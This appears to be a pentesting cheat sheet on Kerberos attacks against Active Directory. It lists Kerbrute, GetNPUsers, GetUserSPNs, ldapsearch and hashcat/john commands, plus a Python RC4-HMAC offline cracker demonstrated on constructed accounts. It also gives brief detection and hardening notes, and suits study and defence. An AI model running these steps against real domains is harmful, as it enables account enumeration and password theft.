User Enumeration
Kerbrute
The client sends a KRB_AS_REQ (TGT request) carrying no pre-authentication data
If the username does not exist, the KDC answers with a KRB-ERROR of type KDC_ERR_C_PRINCIPAL_UNKNOWN
If the username exists, the KDC answers with KDC_ERR_PREAUTH_REQUIRED (or directly with an AS_REP if the account does not require pre-auth); kerbrute then closes the connection and we know the user exists
Because no password is ever tried, this does not create failed-logon events or touch lockout counters, but Kerberos Authentication Service auditing on the DC (event 4768) still records each request, so a large wordlist is noisy
List of Usernames
kerbrute userenum --domain <DOMAIN> --dc <TARGET> <WORDLIST>
With a list of existing domain user accounts, the following attacks can be performed →
- AS_REP Roast Attack
- Password Spraying
Check if a username is valid
kerbrute userenum --domain <DOMAIN> --dc <TARGET> <(echo "<USERNAME>")
AS_REP Roast
This attack looks for users that do not require Kerberos Pre-Authentication
Therefore, it is not necessary to know the credentials of those domain user accounts
INFO
Note that, in order to disable Kerberos Pre-Auth for a Domain User Account, the DONT_REQ_PREAUTH flag (UF_DONT_REQUIRE_PREAUTH, 0x400000 = 4194304 in the userAccountControl attribute) must be set in the User Account Properties
Any client can send an AS_REQ for such a user to the KDC's Authentication Service and receive an AS_REP without proving anything
The enc-part of this AS_REP is encrypted with a key derived from the user's password: with RC4-HMAC (etype 23, the type tools request by default) that key is the user's NT hash (MD4 of the UTF-16LE password); with AES it is a PBKDF2-derived key, which is far slower to crack
That enc-part can therefore be cracked offline to obtain the User Account's password
Once cracked, the attacker has valid credentials for that Domain User Account and can authenticate and request a TGT
GetNPUsers (Impacket)
This tool is used to harvest the AS_REP responses, i.e. the enc-part of each one, encrypted under the account's key (its NT hash when RC4 is negotiated)
List Users with no Pre-Auth Enabled
LdapSearch
ldapsearch -x -H 'ldap://<TARGET>' -D '<USERNAME>' -w '<PASSWORD>' -b 'DC=<1_SUBDOMAIN>,DC=<TLD>' -s sub '(userAccountControl:1.2.840.113556.1.4.803:=4194304)'
AS_REP Capture
To enumerate the users with Kerberos pre-auth disabled and dump their AS_REP messages, this can be done in two ways →
- Specifying a list of existent domain user accounts
GetNPUsers.py -dc-ip <TARGET> <DOMAIN>/ -no-pass -usersfile <FILE> -outputfile <FILE>
- Authenticating directly with a valid domain user account
GetNPUsers.py -dc-ip <TARGET> <DOMAIN>/<USERNAME>:<PASSWORD> -outputfile <FILE>
Both methods write the enc-part of each AS_REP, one per line, in a crackable hashcat format ($krb5asrep$23$<user>@<DOMAIN>:<checksum>$<edata>) to the specified file
Cracking AS_REP Enc-Part
Once the enc-parts of the AS_REPs have been obtained, crack them with hashcat or john
Hashcat
- Long Format
hashcat --hash-type 18200 --attack-mode 0 --force -O --outfile <FILE> <HASH_FILE> <DICTIONARY>
- Short Format
hashcat -m 18200 -a 0 --force -O -o <FILE> <HASH_FILE> <DICTIONARY>
John
john <HASH_FILE> --wordlist <DICTIONARY> --format=krb5asrep
Kerberoasting
This attack tries to harvest TGS tickets (service tickets) for services that run under a domain user account
When a client authenticates to the KDC's AS with a valid domain user account, it receives a TGT encrypted with the key of the KRBTGT domain account
INFO
The NT hash is the MD4 digest of the UTF-16LE encoding of a user account's plaintext password, whether local or domain; with RC4-HMAC (etype 23) Kerberos uses that hash directly as the account's long-term key
The client then presents this TGT to the KDC to obtain a TGS (Ticket Granting Service ticket, i.e. a service ticket)
To do so, the client sends the TGT together with the SPN (Service Principal Name) of the target service to the KDC's Ticket Granting Service
INFO
The SPN or Service Principal Name is a unique identifier of a service available in the domain. The SPN is registered on the Domain Computer or User Account the service runs as
The Ticket Granting Service checks that the submitted TGT is valid
If the validation succeeds, the Ticket Granting Service issues a TGS for the requested SPN
Before delivering the TGS to the client, the ticket's enc-part is encrypted with the key of the Domain Computer or User Account the SPN is registered on (its NT hash when RC4 is used); the client never needs that key, so any authenticated user can request tickets for any SPN
Therefore, what the Kerberoasting attack pursues is to obtain these TGSs and crack them offline to recover the service accounts' passwords. SPNs registered on computer accounts are not worth the effort: machine account passwords are long, random and rotated automatically, which is why the attack targets user accounts
GetUserSPNs.py (Impacket)
This tool is used to perform the following actions →
- List the Service Principal Names available in the AD
- Request a TGS for each of them from the KDC's Ticket Granting Service
SPN Enumeration
To list all the Service Principal Names and the Domain Computer or User Account running each service →
GetUserSPNs
GetUserSPNs.py -dc-ip <TARGET> <DOMAIN>/<USERNAME>:<PASSWORD>
LdapSearch
ldapsearch -x -H 'ldap://<TARGET>' -D '<USERNAME>' -w '<PASSWORD>' -b "dc=<1_SUBDOMAIN>,dc=<TLD>" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2))(serviceprincipalname=*/*))" serviceprincipalname | grep -B 1 servicePrincipalName
TGS Capture
To request a TGS for every SPN registered on a user account →
Standard Output Displayed
GetUserSPNs.py -dc-ip <TARGET> <DOMAIN>/<USERNAME>:<PASSWORD> -request
Stored in a File
GetUserSPNs.py -dc-ip <TARGET> <DOMAIN>/<USERNAME>:<PASSWORD> -request -outputfile <FILE>
A crackable TGS per line should be generated, in hashcat format ($krb5tgs$23$*<user>$<DOMAIN>$<SPN>*$<checksum>$<edata>)
TGS Cracking
Hashcat
- Long Format
hashcat --hash-type 13100 --attack-mode 0 --force -O --outfile <FILE> <HASH_FILE> <DICTIONARY>
- Short Format
hashcat -m 13100 -a 0 --force -O -o <FILE> <HASH_FILE> <DICTIONARY>
John
john <HASH_FILE> --wordlist <DICTIONARY> --format=krb5tgs
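Why the AS_REP and TGS enc-parts from both sections above crack offline at all: with RC4-HMAC the only secret is the account's NT hash, and the ciphertext carries its own MAC, so each candidate password can be verified locally with no KDC involved. The following is an added example written for this page, not code from impacket, hashcat or john. It implements RFC 4757 RC4-HMAC with a pure-Python MD4 (hashlib's md4 is usually disabled under OpenSSL 3), plays the KDC for one AS-REP roast and one Kerberoast, emits the hashcat/john lines in the formats shown above, and cracks them with a tiny wordlist. The realm, usernames, SPN, passwords and the placeholder plaintexts standing in for the DER-encoded EncASRepPart/EncTicketPart are all constructed sample values; the key usage of 8 for the AS-REP enc-part is what Windows KDCs use (RFC 4120 lists 3), and is the value the cracking tools assume.

```python
"""RC4-HMAC (etype 23) roasting end to end: KDC-side encryption, hash line
formatting and offline cracking. Added example, not impacket/hashcat/john code.
All users, realm, SPN, passwords and plaintexts below are constructed values."""
import hashlib, hmac, os, struct

MASK = 0xFFFFFFFF
ASREP_USAGE, TGS_USAGE = 8, 2   # AS-REP enc-part (Windows uses 8, RFC 4120 says 3); ticket enc-part = 2


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; the NT hash is MD4 over the UTF-16LE password."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        A, B, C, D = a, b, c, d
        for i in range(48):                       # three rounds of 16 steps
            if i < 16:
                k, s, fn, add = i, (3, 7, 11, 19)[i % 4], F, 0
            elif i < 32:
                k, s, fn, add = (i % 4) * 4 + (i - 16) // 4, (3, 5, 9, 13)[i % 4], G, 0x5A827999
            else:
                k, s, fn, add = r3[i - 32], (3, 9, 11, 15)[i % 4], H, 0x6ED9EBA1
            A = rotl((A + fn(B, C, D) + X[k] + add) & MASK, s)
            A, B, C, D = D, A, B, C
        a, b, c, d = (a + A) & MASK, (b + B) & MASK, (c + C) & MASK, (d + D) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):                          # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                             # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(key, usage, plaintext, confounder=None):
    """RFC 4757 encryption as the KDC performs it; returns (checksum, edata)."""
    data = (confounder or os.urandom(8)) + plaintext
    k1 = hmac_md5(key, struct.pack("<I", usage))          # K1 = HMAC-MD5(K, usage LE32)
    checksum = hmac_md5(k1, data)                          # MAC over confounder||plaintext
    return checksum, rc4(hmac_md5(k1, checksum), data)     # K3 = HMAC-MD5(K1, checksum)


def rc4_hmac_try_key(key, usage, checksum, edata):
    """Decrypt and verify; None if the key is wrong. This is the cracker's oracle."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    data = rc4(hmac_md5(k1, checksum), edata)
    return data[8:] if hmac.compare_digest(hmac_md5(k1, data), checksum) else None


def asrep_hashcat_line(user, realm, checksum, edata):      # hashcat -m 18200, john krb5asrep
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${edata.hex()}"


def tgs_hashcat_line(user, realm, spn, checksum, edata):    # hashcat -m 13100, john krb5tgs
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"


def parse_hashcat_line(line):
    """Recover (usage, checksum, edata) from either line format above."""
    if line.startswith("$krb5asrep$23$"):
        usage, blob = ASREP_USAGE, line[len("$krb5asrep$23$"):].split(":", 1)[1]
    elif line.startswith("$krb5tgs$23$"):
        usage, blob = TGS_USAGE, line[len("$krb5tgs$23$"):].rsplit("*$", 1)[1]
    else:
        raise ValueError("unsupported hash line")
    cs, ed = blob.split("$", 1)
    return usage, bytes.fromhex(cs), bytes.fromhex(ed)


def crack(line, wordlist):
    """Offline dictionary attack: one MD4, three HMAC-MD5 and one RC4 per candidate."""
    usage, checksum, edata = parse_hashcat_line(line)
    for pw in wordlist:
        if rc4_hmac_try_key(nt_hash(pw), usage, checksum, edata) is not None:
            return pw
    return None


def demo():
    """Play the KDC for both roasts, then crack the resulting lines (constructed data)."""
    realm = "CORP.LOCAL"
    # AS-REP roast: account with DONT_REQ_PREAUTH, enc-part under its own key, usage 8
    cs, ed = rc4_hmac_encrypt(nt_hash("Summer2023"), ASREP_USAGE, b"<EncASRepPart DER>")
    asrep = asrep_hashcat_line("jdoe", realm, cs, ed)
    # Kerberoast: ticket enc-part under the service account's key, usage 2
    cs, ed = rc4_hmac_encrypt(nt_hash("Winter2024!"), TGS_USAGE, b"<EncTicketPart DER>")
    tgs = tgs_hashcat_line("svc_sql", realm, "MSSQLSvc/sql01.corp.local:1433", cs, ed)
    wordlist = ["password", "Spring2022", "Summer2023", "Winter2024!"]
    return {"asrep": crack(asrep, wordlist), "tgs": crack(tgs, wordlist)}
```

The cost per candidate is the point: an MD4, three HMAC-MD5s and one RC4 pass, all GPU-friendly, which is why RC4-encrypted tickets fall so quickly and why tools ask for etype 23. With AES the per-candidate key derivation is 4096 PBKDF2-HMAC-SHA1 iterations, which is the only thing standing between a harvested ticket and the password.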
Miscellaneous
Disable Insecure Symmetric Encryption Algorithms
Kerberos can encrypt the issued tickets with one of the following algorithms (encryption types) →
- DES
- RC4
- AES128_HMAC_SHA1
- AES256_HMAC_SHA1
DES and RC4 are no longer considered secure
Thus, pentesting tools usually request TGTs or TGSs with RC4 (etype 23) as the ticket encryption type, since the key is then simply the account's NT hash and cracking is orders of magnitude faster than for AES, whose keys go through 4096 iterations of PBKDF2 per candidate
AES-encrypted TGSs can still be cracked (hashcat modes 19600 and 19700 for etype 17 and 18), just far more slowly; on the defensive side, service ticket requests with ticket encryption type 0x17 in event 4769 are a common Kerberoasting detection
To ensure that the AS and the TGS issue tickets with a solid cipher, proceed as indicated here